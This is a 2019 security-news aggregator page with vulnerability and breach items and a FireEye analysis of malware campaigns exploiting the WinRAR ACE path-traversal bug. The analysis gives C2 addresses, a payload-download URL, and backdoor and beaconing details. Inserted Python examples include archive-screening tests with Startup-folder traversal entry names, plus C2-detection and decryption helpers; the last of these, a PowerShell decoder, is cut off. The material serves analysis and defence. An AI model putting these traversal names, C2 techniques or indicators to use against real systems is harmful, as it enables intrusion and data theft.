Indian Health Agency Exposed 12.5 Million Records Of Pregnant Women

Another medical data leak has surfaced online. This time, a medical agency linked with the Indian government exposed records of

Indian Health Agency Exposed 12.5 Million Records Of Pregnant Women on Latest Hacking News.

New Apache Web Server Bug Threatens Security of Shared Web Hosts

Mark J Cox, one of the founding members of the Apache Software Foundation and the OpenSSL project, today posted a tweet warning users about a recently discovered important flaw in Apache HTTP Server software. The Apache web server is one of the most popular, widely used open-source web servers in the world that powers almost 40 percent of the whole Internet. The vulnerability, identified as

Tesla autopilot feature hacked to risk oncoming traffic

By Waqas

Tesla’s High-End Vehicle’s Lane Recognition System not Free from Technical Glitches- Keen Labs Claims in New Research. Cybersecurity firm Keen Labs published a research paper [PDF] on Saturday in which it described the three hacks that the company detected that can be used to manipulate Tesla Model S. The first two hacks were directed towards the […]

This is a post from HackRead.com Read the original post: Tesla autopilot feature hacked to risk oncoming traffic

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering what causes this rollover issue. GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into roughly a foot of location error.
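The ten-bit week counter from the paragraph above, worked through in Python as an added example (not code from the McAfee post; the two receiver strategies and every date other than the two rollover dates are assumptions chosen for illustration):

```python
"""GPS week-number rollover worked through (added example, not from the McAfee post).

The navigation message carries the week number in 10 bits, so the value wraps
every 1024 weeks (about 19.6 years; the post says 19.5). A receiver has to
supply the missing high bits itself. Two receiver strategies are modelled here
as assumptions about how firmware behaves, to show where the bug comes from:
  * a fixed-epoch receiver hard-wired to the 1999-2019 epoch (the bug);
  * a pivot-date receiver that assumes the true date lies within 1024 weeks
    after a firmware build date, which stays correct until that pivot is stale.
All dates are UTC. The rollover instant is the end of the day before the
week-start date returned by rollover_date(); for the second rollover that is
the end of April 6, 2019, the date named in the post.
"""
from datetime import date, timedelta

GPS_EPOCH = date(1980, 1, 6)       # GPS week 0 began on this Sunday
WEEK_MODULUS = 1 << 10             # 10-bit week counter wraps at 1024
SPEED_OF_LIGHT_M_S = 299_792_458
METRES_PER_FOOT = 0.3048


def _as_date(d):
    """Accept a date or an ISO 'YYYY-MM-DD' string."""
    return d if isinstance(d, date) else date.fromisoformat(d)


def gps_week(d):
    """Full (unwrapped) GPS week number for a calendar date."""
    return (_as_date(d) - GPS_EPOCH).days // 7


def broadcast_week(d):
    """The 10-bit week number a receiver sees in the navigation message on that date."""
    return gps_week(d) % WEEK_MODULUS


def week_start(full_week):
    """ISO date of the Sunday on which a full GPS week begins."""
    return (GPS_EPOCH + timedelta(weeks=full_week)).isoformat()


def rollover_date(n):
    """ISO date on which the n-th 1024-week epoch begins (rollover is the end of the day before)."""
    return week_start(n * WEEK_MODULUS)


def resolve_fixed_epoch(week10, epoch_index=1):
    """Buggy receiver (assumed model): always decodes into epoch_index (1 = 1999-2019),
    so week 0 broadcast after the April 2019 rollover comes out as August 1999."""
    return week_start(epoch_index * WEEK_MODULUS + week10)


def resolve_with_pivot(week10, pivot):
    """Receiver with a pivot date (assumed model): picks the first week with this 10-bit
    value on or after the pivot. Correct for 1024 weeks after the pivot, wrong after that."""
    ref_week = gps_week(pivot)
    full = ref_week - ref_week % WEEK_MODULUS + week10   # same epoch as the pivot
    if full < ref_week:                                  # before the pivot: must be next epoch
        full += WEEK_MODULUS
    return week_start(full)


def position_error_ft(clock_error_ns):
    """Ranging error in feet for a receiver clock error in nanoseconds (about 1 ft per ns)."""
    return clock_error_ns * 1e-9 * SPEED_OF_LIGHT_M_S / METRES_PER_FOOT


if __name__ == "__main__":
    print("second rollover epoch starts", rollover_date(2))                         # 2019-04-07
    w = broadcast_week("2019-04-07")                                                # 0
    print("fixed-epoch receiver decodes week", w, "as", resolve_fixed_epoch(w))     # 1999-08-22
    print("pivot 2010-01-01 decodes it as", resolve_with_pivot(w, "2010-01-01"))    # 2019-04-07
    print("pivot 1999-09-01 decodes 2019-04-14 as",
          resolve_with_pivot(broadcast_week("2019-04-14"), "1999-09-01"))           # 1999-08-29
    print("10 ns clock error ~ %.1f ft" % position_error_ft(10))                   # ~9.8 ft
```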

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

Singapore Vendor Suffered Data Breach Compromising Details Of 800K Blood Donors

Another massive data breach hits Singapore as investigations reveal new facts. Earlier this month, Singapore’s Health Sciences Authority (HSA) disclosed

Singapore Vendor Suffered Data Breach Compromising Details Of 800K Blood Donors on Latest Hacking News.

Asus Employees Exposed Their Corporate Passwords On Github

Asus recently made it to the news due to Operation ShadowHammer that affected 1 million users. While the chaos isn’t

Asus Employees Exposed Their Corporate Passwords On Github on Latest Hacking News.

Mozilla Fixed Critical Vulnerabilities In Thunderbird 60.6.1

Mozilla recently rolled out patches for two critical vulnerabilities in its Thunderbird email client. The vulnerabilities allegedly affected its IonMonkey

Mozilla Fixed Critical Vulnerabilities In Thunderbird 60.6.1 on Latest Hacking News.

The State of Security: Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.



The State of Security

Hackers May Exploit UC Browser Design Flaw To Deliver Malware

The Chinese UC browser has become immensely popular among Android users. Almost every other Android phone has this browser installed

Hackers May Exploit UC Browser Design Flaw To Deliver Malware on Latest Hacking News.

E Hacking News – Latest Hacker News and IT Security News: TP-Link’s SR20 Smart Home Router Discovered To Come With a Vulnerability As Per Google Security Researcher

TP-Link's SR20 Smart Home Router was recently found to have a vulnerability that allows arbitrary command execution from a local network connection, according to Google security researcher Matthew Garrett. The router, launched in 2016, exposes various commands that run with root privileges and do not require any validation.

The researcher disclosed the issue, and published a proof-of-concept demonstrating it, after he was unable to get a response from TP-Link.

Garrett explained on Twitter that the TP-Link SR20 Smart Home Router ships with TDDP (TP-Link Device Debug Protocol), which is affected by several vulnerabilities; one of them is that version 1 commands are exposed for attackers to exploit.

He says that these exposed commands let an attacker send a request containing a filename followed by a semicolon, which triggers the following procedure.

“This connects back to the machine that sent the command and attempts to download a file via TFTP (Trivial File Transfer Protocol) corresponding to the filename it sent. The main TDDP process waits up to four seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialized earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since TDDP is running as root, you get arbitrary command execution as root,” he explains on his blog.

Garrett says he reported the vulnerability to TP-Link in December through its security disclosure form; the page told him he would get a response within three days, but he has not heard back to date. He added that he also tweeted at TP-Link about the issue, but that drew no response either.

E Hacking News - Latest Hacker News and IT Security News

Unpatched Zero-Days in Microsoft Edge and IE Browsers Disclosed Publicly

Exclusive — A security researcher today publicly disclosed details and proof-of-concept exploits for two 'unpatched' zero-day vulnerabilities in Microsoft's web browsers after the company allegedly failed to respond to his responsible private disclosure. Both unpatched vulnerabilities—one of which affects the latest version of Microsoft Internet Explorer and another affects the latest Edge

Critical Magento SQL Injection Vulnerability Discovered – Patch Your Sites

If your online e-commerce business is running over the Magento platform, you must pay attention to this information. Magento yesterday released new versions of its content management software to address a total of 37 newly-discovered security vulnerabilities. Owned by Adobe since mid-2018, Magento is one of the most popular content management system (CMS) platform that powers 28% of

Kaspersky Lab official blog: Using WinRAR? Install this update right away

Everybody knows that clicking on EXE files can be dangerous. Some people are even aware of the potential risks of opening MS Office files, which can also contain malware. But what can go wrong if you simply unpack a WinRAR archive? Actually, quite a lot.

If you are one of the 500 million people worldwide using WinRAR, you are a perfect target for hijackers. It was recently discovered that every version of WinRAR released in the last 19 years has a critical bug that allows cybercriminals into your computer. Now more than 100 ways to exploit it have been identified — and that number keeps going up.

How the 19-year-old WinRAR bug works

The security flaw enables hijackers to create malicious RAR archives. As soon as this archive is unpacked, a malicious executable file is silently extracted into the Startup folder. On the next reboot this file will be automatically launched, thus infecting your computer with whatever payload the file contains.

To pass undetected even by the most cautious of us, the malefactors usually give this EXE file very innocent-looking names, such as GoogleUpdate.exe.

It should go without saying that malicious archives and the e-mails that contain them are designed to make the victim push the extract button. The lures vary greatly. Sometimes hackers opt for bait labeled as adult images, sometimes they compose an extremely attractive job offer, sometimes they alert you of a terrorist attack risk. In some cases, malefactors pretend to send some technical documents, or inform you about recent changes to local legislation. Some even invite you to download a pirated copy of a hit album, for example, by Ariana Grande.

One way or another, the core idea is that nobody sees much harm in unpacking the archive, so many people click without giving it a second thought.

What happens when the bug is exploited

The malware payloads can be anything: remote access tools of different kinds, enabling hijackers to capture your screen and upload or download files to or from your device, or a banking Trojan, or ransomware, or any other of the innumerable malware species out there.

The most recent example of malware spreading using the WinRAR vulnerability is JNEC.a, new ransomware that locks all of the files on an infected device. At the moment, the cybercriminals are asking for a relatively modest ransom to decrypt your data: 0.05 bitcoins (about $200).

How to protect yourself against malware spreading through WinRAR bug

  • Update your WinRAR right away. Unfortunately, there’s no automatic update, so you have to do it manually. Go to the official WinRAR website, download version 5.70, and install it.
  • To stay on the safe side, do not open any archives you receive from unknown senders.
  • Use a reliable security solution such as Kaspersky Internet Security to immunize your system against potential attack.


Kaspersky Lab official blog

Cisco botched patches for its RV320/RV325 routers

Cisco RV320 and RV325 WAN VPN routers are still vulnerable to attack through two flaws that Cisco had supposedly patched.

#Cisco Small Business Routers still vulnerable to remote code execution & configuration export due to incomplete patch 🚨 #RCE #RV320 #RV325 New advisories: https://t.co/fPzrrkb3Hk https://t.co/xZex3wdfpb https://t.co/iZUuCCEnGx — RedTeam Pentesting (@RedTeamPT) March 27, 2019

There are still many vulnerable devices

CVE-2019-1652 and CVE-2019-1653 were discovered in September 2018 by security experts from RedTeam Pentesting and disclosed … More

The post Cisco botched patches for its RV320/RV325 routers appeared first on Help Net Security.

McAfee Blogs: iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at their keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and impacts devices ranging from the iPhone 5s and later, the iPad Air, and even products running tvOS. These software patches cover a variety of bugs that cybercriminals could use to cause a denial of service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in WebKit, the browser engine Apple uses in many of its products including Safari, Mail, and App Store. Among these vulnerabilities were memory corruption bugs, which could lead to arbitrary code execution. This type of attack allows malicious actors to run any command on the target system, potentially taking over the victim’s files or allowing them to take over the victim’s system remotely. To prevent arbitrary code execution attacks, Apple improved device memory handling, state, and management. These processes control and coordinate device computer memory in order to optimize overall system performance. Another issue patched by this update is the ability for a cybercriminal to bypass sandbox restrictions, which protect a device’s critical infrastructure from suspicious code. To combat this, Apple issued an improvement to validation checks.

While it can be easy to click the “Update Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.




ASUS Hack May Be Biggest Supply-Chain Incident Ever As Backdoor Leaves 1 Million Users Exposed

ASUS Live Update Utility, the online update driver used by ASUS users worldwide, was recently compromised. Hackers added a backdoor

ASUS Hack May Be Biggest Supply-Chain Incident Ever As Backdoor Leaves 1 Million Users Exposed on Latest Hacking News.

ShadowHammer: ASUS software updates exploited to distribute malware

By Waqas

The victims of ShadowHammer malware attack are Windows users. Kaspersky Lab researchers have made a startling new revelation that the world’s leading computer maker ASUS’s live software update system was compromised by cybercriminals to install a backdoor, which affected ASUS customers. The attack occurred in 2018 and according to Kaspersky Lab, the attackers compromised the legitimate […]

This is a post from HackRead.com Read the original post: ShadowHammer: ASUS software updates exploited to distribute malware

WinRAR Zero-day Abused in Multiple Campaigns

WinRAR, an over 20-year-old file archival utility used by over 500 million users worldwide, recently acknowledged a long-standing vulnerability in its code-base. A recently published path traversal zero-day vulnerability, disclosed in CVE-2018-20250 by Check Point Research, enables attackers to specify arbitrary destinations during file extraction of ‘ACE’ formatted files, regardless of user input. Attackers can easily achieve persistence and code execution by creating malicious archives that extract files to sensitive locations, like the Windows “Startup” Start Menu folder. While this vulnerability has been fixed in the latest version of WinRAR (5.70), WinRAR itself does not contain auto-update features, increasing the likelihood that many existing users remain running out-of-date versions. 
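The bug class behind CVE-2018-20250, as described in the Kaspersky post above ("How the 19-year-old WinRAR bug works") and in this introduction, is an extractor that lets an archive entry name choose its own destination. The following is an added example, not code from WinRAR, Check Point or FireEye, of the screening an extractor should apply to every entry name before writing anything: reject absolute or rooted paths, `..` traversal and colon syntax, and only then join the name under the user-chosen output folder. The entry names are constructed for the example and are not indicators from the campaigns below.

```python
"""Screening archive entry names before extraction: an added example of the
defensive check that the ACE path-traversal bug (CVE-2018-20250) shows the need
for. An extractor must never let an entry name pick its own destination outside
the folder the user chose. Entry names below are constructed for this example."""
from pathlib import PurePosixPath, PureWindowsPath
from typing import Dict, Iterable, Optional


def classify_entry(name: str) -> str:
    """Return 'ok', or a reason the entry must not be written where it asks to go.

    PureWindowsPath is used on purpose: archives built on Windows carry
    backslash paths, and this evaluates them with Windows semantics even on
    a Linux analysis box.
    """
    if not name or not name.strip():
        return "empty entry name"
    win = PureWindowsPath(name)
    # A drive letter ('C:'), a root ('\\') or a UNC prefix makes the name absolute
    # or rooted; such an entry ignores the destination folder entirely.
    if win.anchor:
        return "absolute or rooted path (anchor %r)" % win.anchor
    parts = win.parts
    if any(p == ".." for p in parts):
        return "parent-directory traversal"
    # 'C:name' is caught above; 'file:stream' style components are alternate
    # data stream or drive-relative syntax and are rejected as well.
    if any(":" in p for p in parts):
        return "colon inside a path component"
    return "ok"


def safe_destination(dest_root: str, name: str) -> Optional[str]:
    """Join a screened entry name under dest_root; None when the entry is unsafe."""
    if classify_entry(name) != "ok":
        return None
    rel = PurePosixPath(*PureWindowsPath(name).parts)
    return str(PurePosixPath(dest_root) / rel)


def screen_archive(names: Iterable[str]) -> Dict[str, str]:
    """Verdict per entry name; an extractor should abort on any value other than 'ok'."""
    return {n: classify_entry(n) for n in names}


# Constructed entry names: one benign decoy plus the kinds of name a malicious
# archive uses to reach a Startup folder. Not taken from any real sample.
SAMPLE_ENTRIES = [
    "docs/Letter of Approval.pdf",
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dropper.vbs",
    r"C:\Users\Public\Start Menu\Programs\Startup\dropper.bat",
    r"\\fileserver\share\dropper.exe",
    "report.txt:hidden",
]

if __name__ == "__main__":
    for entry, verdict in screen_archive(SAMPLE_ENTRIES).items():
        print("%-80s %s" % (entry, verdict))
```

The check is about containment, not about the Startup folder specifically: as the FireEye conclusion below notes, an attacker can pick any writable path, so a rule that only watches for writes to Startup is not a substitute for refusing every entry that escapes the destination.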

FireEye has observed multiple campaigns leveraging this vulnerability, in addition to those already discussed by 360 Threat Intelligence Center. Below we will look into some campaigns we came across that used customized and interesting decoy documents with a variety of payloads including ones which we have not seen before and the ones that used off-the-shelf tools like PowerShell Empire.

Campaign 1: Impersonating an Educational Accreditation Council

Infection Vector

When the ACE file Scan_Letter_of_Approval.rar is extracted with vulnerable WinRAR versions lower than 5.70, it creates a file named winSrvHost.vbs in the Windows Startup folder without the user’s consent. The VBScript file is executed the next time Windows starts up.

Decoy Document

To avoid user suspicion, the ACE file contains a decoy document, “Letter of Approval.pdf”, which purports to be from CSWE, the Council on Social Work Education, as shown in Figure 1. This seems to be copied from the CSWE website.


Figure 1: Decoy document impersonating CSWE

VBS Backdoor

The VBS file in the Startup folder will be executed by wscript.exe when Windows starts up. The VBS code first derives an ID for the victim using custom logic based on a combination of the ComputerName, Processor_identifier and Username. It obtains these from environment strings, as shown in Figure 2.


Figure 2: Deriving victim ID

Interestingly, the backdoor communicates with the command and control (C2) server through the value of the Authorization HTTP header, using the code in Figure 3.


Figure 3: Base64-encoded data in Authorization header

The VBS backdoor first sends the base64-encoded data, including the victim ID and the ComputerName, using the code in Figure 4.


Figure 4: Base64-encoded victim data

It then extracts the base64-encoded data in the Authorization header of the HTTP response from the C2 server and decodes it. The decoded data starts with the instruction code from the C2 server, followed with additional parameters.

C2 Communication

The malware reaches out to the C2 server at 185[.]162.131.92 via an HTTP request. Actual communication is via the Authorization field, as shown in Figure 5.


Figure 5: Communication via Authorization field

Upon decoding the value of the Authorization field, it can be seen that the malware is sending the Victim ID and the computer name to the C2 server. The C2 server responds with the commands in the value of the Authorization HTTP header, as shown in Figure 6.


Figure 6: C2 commands in Authorization field

Upon decoding, the commands are found to be “ok ok”, which we believe is the default C2 command. After some C2 communication, the C2 server responded with instructions to download the payload from hxxp://185.49.71[.]101/i/pwi_crs.exe, which is a Netwire RAT.
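Two things in the exchange above are unusual enough to detect on a proxy: the Authorization request header carries bare base64 with no authentication scheme in front of it, and the server sends an Authorization header back in its response. The following is an added detection example written for this post, not FireEye code; it runs over constructed proxy log lines (direction, host, header value) that mimic the beacon and the “ok ok” reply, and it flags both patterns.

```python
"""Flagging Authorization headers that carry base64 data rather than a real
authentication scheme, as an added detection example for the VBS backdoor's
C2 channel described above. Log lines are constructed for this example."""
import base64
import binascii
import string
from typing import Dict, Iterable, List, Optional, Tuple

# Schemes a proxy would normally see; anything else is worth a second look.
KNOWN_SCHEMES = {"basic", "bearer", "digest", "negotiate", "ntlm", "hoba", "mutual"}
PRINTABLE = set(string.printable)


def decode_if_base64(value: str) -> Optional[str]:
    """Strict base64 decode; returns the text only when it is printable ASCII."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if text and all(c in PRINTABLE for c in text):
        return text
    return None


def inspect_authorization(direction: str, value: str) -> Dict[str, object]:
    """Classify one Authorization header value.

    direction is 'request' or 'response'. A server has no business sending an
    Authorization header back, which is exactly what the C2 above does.
    """
    scheme, _, _ = value.strip().partition(" ")
    known = scheme.lower() in KNOWN_SCHEMES
    reasons: List[str] = []
    if direction == "response":
        reasons.append("Authorization header present in a server response")
    if not known:
        decoded = decode_if_base64(value.strip())
        if decoded is not None:
            reasons.append("schemeless base64 value decodes to text: %r" % decoded)
        else:
            reasons.append("unrecognized authentication scheme %r" % scheme)
    return {"suspicious": bool(reasons), "reasons": reasons}


# Constructed proxy log: direction|host|Authorization value. The second and
# third lines mimic the beacon and the 'ok ok' reply described above; the
# host is a documentation address, not the C2 from the post.
SAMPLE_LOG = [
    "request|intranet.example|Basic dXNlcjpwYXNz",
    "request|203.0.113.10|" + base64.b64encode(b"a1b2c3d4|WORKSTATION-01").decode(),
    "response|203.0.113.10|b2sgb2s=",
    "request|api.example|Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc",
]


def scan_log(lines: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (host, reasons) for every line whose Authorization value is suspicious."""
    hits = []
    for line in lines:
        direction, host, auth = line.split("|", 2)
        verdict = inspect_authorization(direction, auth)
        if verdict["suspicious"]:
            hits.append((host, verdict["reasons"]))
    return hits


if __name__ == "__main__":
    for host, reasons in scan_log(SAMPLE_LOG):
        print(host, "->", "; ".join(reasons))
```

Legitimate traffic with a custom scheme will also land in the "unrecognized scheme" bucket, so in production the decoded-text rule and the response-direction rule are the ones to alert on; the scheme rule is better used for hunting.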

Commands Supported by VBS Backdoor

| Command | Explanation |
| --- | --- |
| d | Delete the VBS file and exit process |
| Pr | Download a file from a URL and execute it |
| Hw | Get hardware info |
| av | Look for antivirus installed from a predefined list. |

Indicators

| File Name | Hash/IP Address |
| --- | --- |
| Scan_Letter_of_Approval.rar | 8e067e4cda99299b0bf2481cc1fd8e12 |
| winSrvHost.vbs | 3aabc9767d02c75ef44df6305bc6a41f |
| Letter of Approval.pdf | dc63d5affde0db95128dac52f9d19578 |
| pwi_crs.exe | 12def981952667740eb06ee91168e643 |
| C2 | 185[.]162.131.92 |
| Netwire C2 | 89[.]34.111.113 |

Campaign 2: Attack on Israeli Military Industry

Infection Vector

Based on the email uploaded to VirusTotal, the attacker seems to send a spoofed email to the victim with an ACE file named SysAid-Documentation.rar as an attachment. Based on the VirusTotal uploader and the email headers, we believe this is an attack on an Israeli military company.

Decoy Files

The ACE file contains decoy files related to documentation for SysAid, a help desk service based in Israel. These files are shown as they would be displayed in WinRAR in Figure 7.


Figure 7: Decoy files

Thumbs.db.lnk

This LNK file's target is ‘C:\Users\john\Desktop\100m.bat’. But when we look at the icon location using a LNK parser, as shown in Figure 8, it points to an icon remotely hosted on one of the C2 servers, which can be used to steal NTLM hashes.


Figure 8: LNK parser output

SappyCache Analysis

Upon extraction, WinRAR copies a previously unknown payload we call SappyCache to the Startup folder with the file name ‘ekrnview.exe’. The payload is executed the next time Windows starts up.

SappyCache tries to fetch the next-stage payload using three approaches:

1) Decrypting a File: The malware tries to read the file at %temp%\..\GuiCache.db. If it is successful, it tries to decrypt it using RC4 to get the C2 URLs, as shown in Figure 9.


Figure 9: Decrypting file at GuiCache.db

2) Decrypting a Resource: If it is not successful in retrieving the C2 URL using the previous method, the malware tries to retrieve the encrypted C2 URLs from a resource section, as shown in Figure 10. If it is successful, it will decrypt the C2 URLs using RC4.


Figure 10: Decrypting a resource

3) Retrieving From C2: If it is not successful in retrieving the C2 URLs using those previous two methods, the malware tries to retrieve the payload from four different hardcoded URLs mentioned in the indicators. The malware creates the HTTP request using the following information:

  • Computer Name, retrieved using the GetComputerNameA function, as the HTTP parameter ‘name’ (Figure 11).


Figure 11: Retrieving computer name using GetComputerNameA

  • Windows operating system name, retrieved by querying the ProductName value from the registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion, as the HTTP parameter ‘key’ (Figure 12).


Figure 12: Retrieving Windows OS name using ProductName value

  • The module name of the malware, retrieved using the GetModuleFileNameA function, as the HTTP parameter ‘page’ (Figure 13).


Figure 13: Retrieving malware module name using GetModuleFileNameA

  • The list of processes and their module names, retrieved using the Process32First and Module32First APIs, as the HTTP parameter ‘session_data’ (Figure 14).


Figure 14: Retrieving processes and modules using Process32First and Module32First

A fragment of the HTTP request that is built with the information gathered is shown in Figure 15.


Figure 15: HTTP request fragment

If any of the aforementioned methods is successful, the malware tries to execute the decrypted payload. During our analysis, the C2 server did not respond with a next-level payload.
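When triaging a sample that keeps its C2 URLs RC4-encrypted in a cache file or a PE resource, as SappyCache does, the usual analyst task is to reimplement the cipher, run it over the blob with the recovered key and pull URL-shaped strings out of the result. The block below is an added example for this post, not FireEye tooling: it implements RC4, extracts and defangs URLs, and walks the same file-then-resource-then-hardcoded order described above. The key, the plaintext URLs and the encrypted blobs are constructed for the example; the real sample's key is not given in the post.

```python
"""Recovering RC4-encrypted C2 URLs from a file or resource blob, as an added
analyst example for the SappyCache lookup order described above. The key and
the encrypted blobs here are constructed for this example; the real sample's
key is not given on the page."""
import re
from typing import List, Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the keystream generator.
    The same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# URL-shaped runs in decrypted bytes; a NUL or whitespace ends a URL.
URL_RE = re.compile(rb"https?://[\w.\-]+(?:/[^\s\x00]*)?")


def extract_c2_urls(blob: bytes, key: bytes) -> List[str]:
    """Decrypt blob and return URL strings, defanged (hxxp) for reporting."""
    plain = rc4(key, blob)
    return [m.group(0).decode("ascii", "replace").replace("http", "hxxp", 1)
            for m in URL_RE.finditer(plain)]


def recover_config(file_blob: Optional[bytes], resource_blob: Optional[bytes],
                   key: bytes) -> Tuple[str, List[str]]:
    """Mirror the sample's fallback order: cache file first, then PE resource,
    and only then the hardcoded URLs (which the caller supplies)."""
    for source, blob in (("file", file_blob), ("resource", resource_blob)):
        if blob:
            urls = extract_c2_urls(blob, key)
            if urls:
                return source, urls
    return "hardcoded", []


# Constructed test data (assumed key and URLs; not indicators from the post).
KEY = b"example-key-not-real"
FILE_BLOB = rc4(KEY, b"http://c2-a.example.invalid/verify.php\x00"
                     b"http://c2-b.example.invalid/admin/verify.php")
RESOURCE_BLOB = rc4(KEY, b"https://c2-c.example.invalid/loggoff.php")

if __name__ == "__main__":
    print(recover_config(FILE_BLOB, RESOURCE_BLOB, KEY))
    print(recover_config(None, RESOURCE_BLOB, KEY))
    print(recover_config(FILE_BLOB, RESOURCE_BLOB, b"wrong-key"))
```

A wrong key yields no URL matches, so the function falls through to the hardcoded stage, which is the same observable behaviour the sample shows when the file and resource stages fail.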

Indicators

| File Name/Type | Hash/URL |
| --- | --- |
| SysAid-Documentation.rar | 062801f6fdbda4dd67b77834c62e82a4 |
| SysAid-Documentation.rar | 49419d84076b13e96540fdd911f1c2f0 |
| ekrnview.exe | 96986B18A8470F4020EA78DF0B3DB7D4 |
| Thumbs.db.lnk | 31718d7b9b3261688688bdc4e026db99 |
| URL1 | www.alahbabgroup[.]com/bakala/verify.php |
| URL2 | 103.225.168[.]159/admin/verify.php |
| URL3 | www.khuyay[.]org/odin_backup/public/loggoff.php |
| URL4 | 47.91.56[.]21/verify.php |
| Email | 8c93e024fc194f520e4e72e761c0942d |

Campaign 3: Potential Attack in Ukraine with Empire Backdoor

Infection Vector

The ACE file named zakon.rar is propagated using a malicious URL mentioned in the indicators. 360 Threat Intelligence Center has also encountered this campaign.

Decoy Documents

The ACE file contains a file named Ukraine.pdf, which contains a message on the law of Ukraine about public-private partnerships that purports to be a message from Viktor Yanukovych, former president of Ukraine (Figure 16 and Figure 17).


Figure 16: Ukraine.pdf decoy file


Figure 17: Contents of decoy file

Based on the decoy PDF name, the decoy PDF content and the VirusTotal uploader, we believe this is an attack on an individual in Ukraine.

Empire Backdoor

When the file contents are extracted, WinRAR drops a .bat file named mssconf.bat in the Startup folder. The batch file contains commands that invoke base64-encoded PowerShell commands. After decoding, the PowerShell commands invoked are found to be the Empire backdoor, as shown in Figure 18. We did not observe any additional payloads at the time of analysis.
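A batch file that launches PowerShell with an encoded command, as mssconf.bat does, is decoded the same way every time: the argument to -EncodedCommand (or one of its accepted abbreviations) is base64 of UTF-16LE text, not UTF-8, and the launch usually carries hiding switches such as -NoP and -W Hidden. The following is an added triage example written for this post, not FireEye code: it pulls the encoded argument out of each batch line, decodes it, and lists the hiding switches. The batch content is constructed and decodes to a harmless Write-Output; the real mssconf.bat is not reproduced.

```python
"""Decoding a PowerShell -EncodedCommand argument out of a batch file, as an
added triage example for the Startup-folder .bat described above. The batch
content is constructed and runs a harmless Write-Output; no real sample is used."""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the spellings
# commonly seen in droppers are -e, -ec, -enc and the full flag.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Switches whose only purpose in a dropper is to keep the launch quiet.
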